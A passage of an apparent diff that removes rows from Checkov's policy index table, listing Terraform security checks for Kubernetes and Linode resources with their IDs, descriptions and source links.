-| 1845 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
-| 1846 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
-| 1847 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) |
-| 1848 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
-| 1849 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
-| 1850 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
-| 1851 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) |
-| 1852 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
-| 1853 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
-| 1854 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
-| 1855 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) |
-| 1856 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
-| 1857 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
-| 1858 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
-| 1859 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) |
-| 1860 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
-| 1861 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
-| 1862 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
-| 1863 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) |
-| 1864 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
-| 1865 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
-| 1866 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
-| 1867 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) |
-| 1868 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
-| 1869 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
-| 1870 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
-| 1871 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) |
-| 1872 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1873 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1874 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1875 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1876 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1877 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1878 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1879 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1880 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1881 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1882 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1883 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1884 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1885 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1886 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1887 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1888 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1889 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1890 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1891 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1892 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1893 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1894 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1895 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1896 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1897 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) |
-| 1898 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1899 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1900 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1901 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) |
-| 1902 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) |
-| 1903 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1904 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1905 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1906 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) |
-| 1907 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1908 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1909 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1910 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) |
-| 1911 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1912 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1913 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1914 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1915 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1916 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) |
-| 1917 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1918 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1919 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1920 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) |
-| 1921 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1922 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1923 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1924 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1925 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1926 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) |
-| 1927 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1928 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1929 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) |
-| 1930 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | 
[ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 1931 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | -| 1932 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1933 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1934 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1935 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 1936 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1937 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1938 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets 
as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1939 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 1940 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | -| 1941 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1942 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1943 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1944 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 1945 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | 
[AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1946 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1947 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1948 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 1949 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 1950 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 1951 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1952 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively 
used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1953 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1954 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 1955 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1956 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1957 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1958 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 1959 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 1960 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure 
that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 1961 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1962 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1963 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1964 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 1965 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | -| 1966 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | 